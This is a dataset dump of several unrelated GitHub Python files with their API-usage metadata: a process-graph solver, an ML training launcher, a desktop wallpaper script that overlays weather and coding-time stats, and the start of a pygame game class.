"xcube.core.normalize.core.normalize.normalize_dataset", "line_number": 284, "usage_type": "call"}, {"api_name": "xcube.core.normalize.core", "line_number": 284, "usage_type": "attribute"}, {"api_name": "xcube.core.normalize", "line_number": 284, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 314, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 335, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 340, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 342, "usage_type": "call"}, {"api_name": "typing.Collection", "line_number": 363, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 365, "usage_type": "call"}, {"api_name": "xcube.core.store.DefaultSearchMixin", "line_number": 377, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStore", "line_number": 377, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonBooleanSchema", "line_number": 385, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 389, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 393, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 383, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.alias", "line_number": 401, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 400, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.alias", "line_number": 405, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 405, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 403, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 408, "usage_type": "name"}, {"api_name": "xcube.core.store.DatasetDescriptor", "line_number": 413, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 415, "usage_type": "name"}, {"api_name": "xcube.core.store.DatasetDescriptor", "line_number": 409, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 446, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 446, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 425, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 457, "usage_type": "name"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 457, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 459, "usage_type": "name"}, {"api_name": "xcube.core.store.DataDescriptor", "line_number": 459, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 464, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 465, "usage_type": "name"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 469, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 466, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 471, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 472, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 473, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 480, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 481, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 490, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 492, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 494, "usage_type": "name"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 499, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.is_super_type_of", "line_number": 504, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 504, "usage_type": "name"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 508, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 509, "usage_type": "call"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 510, "usage_type": "name"}]} +{"seq_id": "4864705129", "text": "from math import ceil\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom typing import Any, TypeVar, Optional\nfrom copy import deepcopy\nimport itertools\n\nfrom krpsim.parsing import Process\n\n# Custom types\nT = TypeVar('T')\nMatrix = list[list[T]]\n\nCOLOR_BLUE = '\\033[38;5;74m'\nRESET_COLOR = '\\033[0m'\n\n@dataclass\nclass NodeElem:\n \"\"\"\n Wrapper around a process and the number of time it needs to be\n executed to produce enough stock for the parent process\n _name: name of process\n _times: number of times the process is needed to produce enough stock\n \"\"\"\n _name: str\n _times: int\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def times(self) -> int:\n return self._times\n\n @name.setter\n def name(self, value) -> None:\n self._name = value\n\n @times.setter\n def times(self, value) -> None:\n self._times = value\n\n def __str__(self) -> str:\n return f'[{self.name} * {self.times}]'\n \n\n\n@dataclass\nclass Node:\n \"\"\"\n Collection of processes and stock\n list: list of tuple of process names and their number of executions\n _stock: dict containing the state of the stock current node \n \"\"\"\n\n _process_list: list[NodeElem]\n _stock: dict[str, int]\n\n\n @property\n def process_list(self) -> dict[str, int]:\n return self._process_list\n\n @property\n def stock(self) -> dict[str, int]:\n return self._stock\n\n @process_list.setter\n def process_list(self, value) -> None:\n self._process_list = value\n\n @stock.setter\n def stock(self, value) -> None:\n self._stock = value\n\n def __str__(self) -> str:\n \n string: str = f'{COLOR_BLUE}Processes{RESET_COLOR}: '\n for process in self.process_list:\n string += f'({process.name} * {process.times}) '\n string += f'| {COLOR_BLUE}Stocks{RESET_COLOR}: '\n for name, qty in self.stock.items():\n if qty != 0:\n string += f'({name}: {qty}) '\n return string\n\n def __add__(self, other):\n return Node([*self.process_list, *other.process_list], self.stock)\n\n def __radd__(self, other):\n return self if other == 0 else self.__add__(other)\n\n @staticmethod\n def combinations(matrix: Matrix) -> Matrix:\n \"\"\"\n Get the combinations of elements in the matrix\n returns: matrix of combinations\n example: \n matrix = [[1, 2, 3], [4, 5], [6, 7]]\n Node.combinations(matrix)\n [[1, 4, 6],\n [1, 5, 6],\n [2, 4, 6],\n [2, 5, 6],\n [3, 4, 6],\n [3, 5, 6],\n [1, 4, 7],\n [1, 5, 7],\n [2, 4, 7],\n [2, 5, 7],\n [3, 4, 7],\n [3, 5, 7]])\n \"\"\"\n\n return np \\\n .array(np.meshgrid(*matrix)) \\\n .T \\\n .reshape(-1, len(matrix)) \\\n .tolist()\n\n\n\n@dataclass\nclass Graph:\n \"\"\"\n Class representing a graph of processes connected to each other by the stock they produce/need.\n _process: dict of processes.\n _stock: dict of stocks. dict[key: stock name, value: quantity]\n _optimize: name of stock to optimize\n _needs: dict of processes regrouped by the stock they need.\n \"\"\"\n _process: dict[str, Process]\n _stock: dict[str, int]\n _optimize: str\n _needs: dict[str, list[Process]] = field(default_factory=dict)\n _produces: dict[str, list[Process]] = field(default_factory=dict)\n _paths: list[list[Node]] = field(default_factory=list)\n\n @property\n def process(self) -> dict[str, Process]:\n return self._process\n \n @property\n def stock(self) -> dict[str, int]:\n return self._stock\n \n @property\n def optimize(self) -> int:\n return self._optimize\n \n @property\n def needs(self) -> dict[str, list]:\n return self._needs\n \n @property\n def produces(self) -> dict[str, list]:\n return self._produces\n \n @property\n def paths(self) -> list[list[Node]]:\n return self._paths\n \n @process.setter\n def process(self, value) -> None:\n self._process = value\n \n @stock.setter\n def stock(self, value) -> None:\n self._stock = value\n \n @optimize.setter\n def optimize(self, value) -> None:\n self._optimize = value\n \n @needs.setter\n def needs(self, value) -> None:\n self._needs = value\n \n @produces.setter\n def produces(self, value) -> None:\n self._produces = value\n \n @paths.setter\n def paths(self, value) -> None:\n self._paths = value\n\n def sort(self) -> None:\n \"\"\"\n Method that sorts processes by their needs and products\n \"\"\"\n for stock, process in self.needs.items():\n process.sort(key=lambda p: p.need[stock])\n for stock, process in self.produces.items():\n process.sort(key=lambda p: p.result[stock], reverse=True)\n\n def build(self) -> None:\n \"\"\"\n Method that builds a graph by regrouping and \n \"\"\"\n for process in self.process.values():\n for stock in process.need:\n self.needs.setdefault(stock, []).append(process)\n self.stock.setdefault(stock, 0)\n for stock in process.result:\n self.produces.setdefault(stock, []).append(process)\n self.stock.setdefault(stock, 0)\n\n def update_stocks(self, node: Node) -> None:\n for process in node.process_list:\n for need, qty in self.process[process.name].need.items():\n node.stock[need] -= qty\n return node\n\n def stocks_available(self, node: Node) -> Optional[bool]:\n dead_end = True\n available = True\n for node_elem in node.process_list:\n for need, qty in self.process[node_elem.name].need.items():\n if node.stock[need] <= 0 or qty < node.stock[need]:\n available = False\n else:\n dead_end = False\n return available if not dead_end else None\n \n def get_root(self) -> list[Node]:\n \"\"\"\n Get root nodes that produces the stock to optimize\n returns: a node with a list of process that produces the stock to optimize\n \"\"\"\n process_list: list[NodeElem] = [NodeElem(p.name, 1) for p in self.produces[self.optimize]]\n _node_list: list[Node] = [Node([process], deepcopy(self.stock)) for process in process_list]\n root: list[Node] = [self.update_stocks(node) for node in _node_list]\n return root\n\n def get_process_children(self, parent_process: NodeElem, stock: dict[str, int]) -> list[Node]:\n \"\"\"\n Get all possible nodes that produce stocks that is needed by parent\n returns: list of combinations of nodes that produces stocks needed by\n one of the process (parent) of the parent node\n \"\"\"\n matrices: Matrix = []\n for need, qty in self.process[parent_process.name].need.items():\n if stock.get(need, 1) >= qty:\n continue\n matrices.append([NodeElem(p.name, 1) for p in self.produces[need]])\n if not matrices:\n return []\n combinations = Node.combinations(matrices)\n return [Node(lst, deepcopy(stock)) for lst in combinations]\n\n def get_children(self, parent: Node) -> list[Node]:\n \"\"\"\n Get a combination of all possible needed process as nodes\n parent: current node of processes\n returns: list of combinations of nodes that produces stocks needed by\n all the processes in the parent node\n \"\"\"\n nodes_lists: Matrix = [self.get_process_children(process, parent.stock) for process in parent.process_list]\n nodes_combinations: Matrix = Node.combinations(nodes_lists)\n _children: list[Node] = [sum(nodes) for nodes in nodes_combinations]\n children: list[Node] = [self.update_stocks(node) for node in _children]\n return children\n \n def depth_first_search(self, current: Node, path: list[Node]) -> None:\n \"\"\"\n Perfoms DFS to find every sequence of process that will be stored in self.paths\n current: the current node to explore\n \"\"\"\n path.append(current)\n for child in self.get_children(current):\n path_found = self.stocks_available(child)\n if path_found == True:\n path.append(child)\n return paths.append(path)\n elif path_found == False:\n return self.depth_first_search(child, path)\n else:\n return None\n return None\n\n def start_dfs(self) -> None:\n root = self.get_root()\n for node in root:\n self.depth_first_search(node, [])", "repo_name": "arlaine4/Krp", "sub_path": "src/krpsim/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 8777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TypeVar", "line_number": 11, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 117, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 49, "usage_type": "name"}, {"api_name": "krpsim.parsing.Process", "line_number": 133, "usage_type": "name"}, {"api_name": "krpsim.parsing.Process", "line_number": 136, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 136, "usage_type": "call"}, {"api_name": "krpsim.parsing.Process", "line_number": 137, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 137, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 138, "usage_type": "call"}, {"api_name": "krpsim.parsing.Process", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 215, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 232, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 250, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 124, "usage_type": "name"}]} +{"seq_id": "72829752193", "text": "from src.gradient_descent import GradientDescent\nimport argparse\nimport torch\nimport numpy as np\nfrom src.training.utils import from_txt_to_bool\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"--n_instances\", type=int, help=\"# of target samples (default=100)\", default=100\n)\nparser.add_argument(\n \"--loglr\", type=int, help=\"value of the log(lr) (default=-1)\", default=-1\n)\nparser.add_argument(\n \"--cut\", type=int, help=\"value of gradient cutoff (deprecated)\", default=128\n)\nparser.add_argument(\n \"--logdiffsoglia\",\n type=int,\n help=\"value of the early stopping thrashold (default=-5)\",\n default=-5,\n)\nparser.add_argument(\n \"--n_ensambles\",\n type=int,\n help=\"# of initial configuration (default=1)\",\n default=1,\n)\nparser.add_argument(\n \"--target_path\",\n type=str,\n help=\"name of the target dataset (default='data/dataset/valid_sequential_64_l_0_h_15000_n.npz')\",\n default=\"data/dataset/valid_sequential_64_l_0_h_15000_n.npz\",\n)\nparser.add_argument(\n \"--init_path\",\n type=str,\n help=\"name of the init dataset (default='data/dataset/valid_sequential_64_l_0_h_150000_n.npz')\",\n default=\"data/dataset/train_sequential_64_l_0_h_150000_n.npz\",\n)\n\n\nparser.add_argument(\n \"--model_name\",\n type=str,\n help=\"name of model (default='ising_model_cnn_h_uniform_30_hc_3_ks_2_ps')\",\n default=\"ising_model_cnn_30_hc_3_ks_2_ps\",\n)\nparser.add_argument(\n \"--run_name\",\n type=str,\n help=\"name of the run (default='ising_model_cnn_h_uniform_30_hc_3_ks_2_ps')\",\n default=\"h_3.0_ising_model_unet_gelu_3_layers_30_hc_ks_2_ps\",\n)\nparser.add_argument(\n \"--epochs\", type=int, help=\"# of epochs (default=10001)\", default=10001\n)\nparser.add_argument(\n \"--variable_lr\",\n type=str,\n help=\"if it is true implement a dynamic learning rate (default=True)\",\n default=\"False\",\n)\nparser.add_argument(\n \"--early_stopping\",\n type=str,\n help=\"if it is true implement the early stopping (default=False)\",\n default=\"False\",\n)\nparser.add_argument(\"--L\", type=int, help=\"size of the system (default=14)\", default=14)\nparser.add_argument(\n \"--resolution\", type=int, help=\"resolution of the system (default=64)\", default=64\n)\nparser.add_argument(\n \"--final_lr\",\n type=float,\n help=\"resolution of the system (default=10**-6)\",\n default=10 ** -6,\n)\nparser.add_argument(\n \"--num_threads\",\n type=int,\n help=\"number of threads for the torch process (default=1)\",\n default=1,\n)\nparser.add_argument(\n \"--device\",\n type=str,\n help=\"the threshold difference for the early stopping (default=device available)\",\n default=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n)\nparser.add_argument(\n \"--seed\",\n type=int,\n help=\"seed for numpy and pytorch (default=42)\",\n default=42,\n)\n\nparser.add_argument(\n \"--long_range\",\n type=bool,\n help=\"if True, use the long range option in the energy (default=False)\",\n action=argparse.BooleanOptionalAction,\n)\n\n\nargs = parser.parse_args()\n\nn_init = np.load(args.init_path)[\"density\"]\n\ngd = GradientDescent(\n n_instances=args.n_instances,\n run_name=args.run_name,\n loglr=args.loglr,\n n_init=n_init,\n cut=args.cut,\n n_ensambles=args.n_ensambles,\n model_name=args.model_name,\n target_path=args.target_path,\n epochs=args.epochs,\n variable_lr=from_txt_to_bool(args.variable_lr),\n early_stopping=from_txt_to_bool(args.early_stopping),\n L=args.L,\n resolution=args.resolution,\n final_lr=args.final_lr,\n num_threads=args.num_threads,\n device=args.device,\n seed=args.seed,\n logdiffsoglia=args.logdiffsoglia,\n long_range=args.long_range,\n)\n\ngd.run()\n", "repo_name": "emacosta95/dft_for_ising", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "argparse.BooleanOptionalAction", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 110, "usage_type": "call"}, {"api_name": "src.gradient_descent.GradientDescent", "line_number": 112, "usage_type": "call"}, {"api_name": "src.training.utils.from_txt_to_bool", "line_number": 122, "usage_type": "call"}, {"api_name": "src.training.utils.from_txt_to_bool", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "74712109315", "text": "import os,random\nfrom this import d\nfrom PIL import Image, ImageDraw, ImageFont\nimport datetime\nimport subprocess\n\nwindow = [1920, 1080]\n\ndef get_wind_dir(angle):\n dir = \"W\"\n if (angle > 0):\n dir = \"W\"\n if (angle > 23):\n dir = \"SW\"\n if (angle > 68):\n dir = \"S\"\n if (angle > 113):\n dir = \"SE\"\n if (angle > 158):\n dir = \"E\"\n if (angle > 203):\n dir = \"NE\"\n if (angle > 248):\n dir = \"N\"\n if (angle > 293):\n dir = \"NW\"\n if (angle > 338):\n dir = \"W\"\n return dir\n\n\ndef get_time(time : str):\n if (time < 10):\n return \"0\" + str(time)\n else:\n return str(time)\n\nnow = datetime.datetime.now()\n\nfile = random.choice(os.listdir(\"/home/mbecel/scripts/pimp_bg/images/\"))\nos.system(f\"cp ~/scripts/pimp_bg/images/{file} ~/scripts/pimp_bg/bg.png\")\nbackground = Image.open(\"/home/mbecel/scripts/pimp_bg/bg.png\")\nfont_path = \"/home/mbecel/scripts/pimp_bg/Timeless.ttf\"\n\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/getplace'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\n\n\n# Show hour\nfont = ImageFont.truetype(font=font_path, size=110)\nImageDraw.Draw(background).text((1450, 40), f\"{get_time(now.hour)}:{get_time(now.minute)}\", (255, 255, 255), font=font)\n\n# Show Info ip\nfont = ImageFont.truetype(font=font_path, size=18)\nImageDraw.Draw(background).text((1750, 50), f\"{stdout.decode('UTF-8')}\", (255, 255, 255), font=font)\n\n# Show tiempo\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/gettemp'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\nprint(stdout.decode('ASCII').split(\" \"))\nlist_temp = stdout.decode('ASCII').split(\" \")\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/getwaka'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\nlist_waka = stdout.decode('ASCII').split(\" \")\nprint(stdout.decode('ASCII'))\n\nif (list_temp[0] != \"No\"):\n font = ImageFont.truetype(font=font_path, size=60)\n ImageDraw.Draw(background).text((1745, 200), f\"{list_temp[0]}°C\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=18)\n ImageDraw.Draw(background).text((1500, 190), f\"Rain: {list_temp[1]}mm\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 210), f\"Cloud: {list_temp[2]}%\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 230), f\"Wind speed: {list_temp[3]} km/h\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 250), f\"Wind direction: {list_temp[4]}° ({get_wind_dir(int(list_temp[4]))})\", (255, 255, 255), font=font)\n\n ImageDraw.Draw(background).line([(1730, 10), (1730, 300)], fill=(255, 255, 255), width=10)\n ImageDraw.Draw(background).line([(1450, 170), (1900, 170)], fill=(255, 255, 255), width=10)\n\nif (list_waka[0] != \"No\"):\n today = int(list_waka[2]) * 60 + int(list_waka[3])\n total = int(list_waka[4]) * 60 + int(list_waka[5])\n percentage = round((today / total) * 100)\n font = ImageFont.truetype(font=font_path, size=22)\n ImageDraw.Draw(background).text((1520, 790), f\"Coding time today:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1760, 790), f\"This week:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1520, 950), f\"Today status:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1760, 950), f\"Average:\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=50)\n ImageDraw.Draw(background).text((1490, 850), f\"{list_waka[2]}h {list_waka[3]}min\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=38)\n ImageDraw.Draw(background).text((1520, 1030), f\"({percentage}%)\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1750, 855), f\"{list_waka[0]}h {list_waka[1]}min\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1750, 1015), f\"{list_waka[4]}h {list_waka[5]}min\", (255, 255, 255), font=font)\n\n if (percentage == 100):\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(10, 255, 10), width=20)\n elif (percentage > 100):\n if (percentage > 200):\n mx = 250\n else:\n mx = ((((percentage - 100) * 250) / 100))\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(10, 255, 10), width=20)\n ImageDraw.Draw(background).line([(1460, 1020), (1460 + mx, 1020)], fill=(10, 255, 10), width=20)\n elif (percentage <= 0):\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(255, 10, 10), width=20)\n else:\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(255, 10, 10), width=20)\n ImageDraw.Draw(background).line([(1460, 1000), (1460 + ((percentage * 250) / 100), 1000)], fill=(10, 255, 10), width=20)\n\n ImageDraw.Draw(background).line([(1730, 780), (1730, 1070)], fill=(255, 255, 255), width=10)\n ImageDraw.Draw(background).line([(1450, 940), (1900, 940)], fill=(255, 255, 255), width=10)\n\n\n\n\nbackground.save(\"/home/mbecel/scripts/pimp_bg/bg.png\")\n\nbackground.close()\nos.system(\"cp /home/mbecel/scripts/pimp_bg/bg.png /home/mbecel/scripts/pimp_bg/current_bg.png\")\nos.system(f'gsettings set org.gnome.desktop.background picture-uri \"file:///home/mbecel/scripts/pimp_bg/current_bg.png\"')", "repo_name": "maelbecel/Usefull-scripts", "sub_path": "pimp_bg/pimp_bg.py", "file_name": "pimp_bg.py", "file_ext": "py", "file_size_in_byte": 5422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 45, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 55, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 68, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 71, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 71, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 74, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 74, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 84, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 85, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 86, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 90, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 91, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 91, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 92, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 92, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 93, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 93, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 96, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 102, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 102, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 103, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 103, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 105, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 105, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 107, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 108, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 108, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 110, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 110, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 111, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 111, "usage_type": "name"}, {"api_name": "os.system", "line_number": 119, "usage_type": "call"}, {"api_name": "os.system", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "4123838780", "text": "import copy\nimport random\nimport math\nimport threading\nimport pygame\nfrom pygame.locals import *\nfrom src.Constants import *\nfrom src.classes.Stone import Stone\nfrom src.classes.EnemySpaceship import EnemySpaceship\nfrom src.classes.Explosion import Explosion\nfrom src.classes.SpaceshipWreckage import SpaceshipWreckage\nfrom src.classes.BlueDust import BlueDust\nfrom src.classes.GreenDust import GreenDust\nfrom src.classes.TexturedObject import TexturedObject\nfrom src.classes.SoundManager import SOUND_MANAGER\n\npygame.init()\n\nclass World(TexturedObject):\n def __init__(self, player, spaceship = None):\n self.pos = WORLD_POS\n self.size = WORLD_SIZE\n TexturedObject.__init__(self, pos = self.pos, size = self.size, background = WORLD_BACKGROUND)\n self.background = copy.copy(self.image)\n self.all_sprites_lock = threading.Lock()\n self.player = player\n self.spaceship = spaceship\n self.stones = pygame.sprite.LayeredDirty()\n self.enemy_spaceships = pygame.sprite.LayeredDirty()\n self.spaceship_wreckages = pygame.sprite.LayeredDirty()\n self.shots = pygame.sprite.LayeredDirty()\n self.effects = pygame.sprite.LayeredDirty()\n self.dust = pygame.sprite.LayeredDirty()\n self.all_objects = pygame.sprite.LayeredDirty()\n global SOUND_MANAGER\n SOUND_MANAGER.load_sound(EXPLOSION_SOUND, 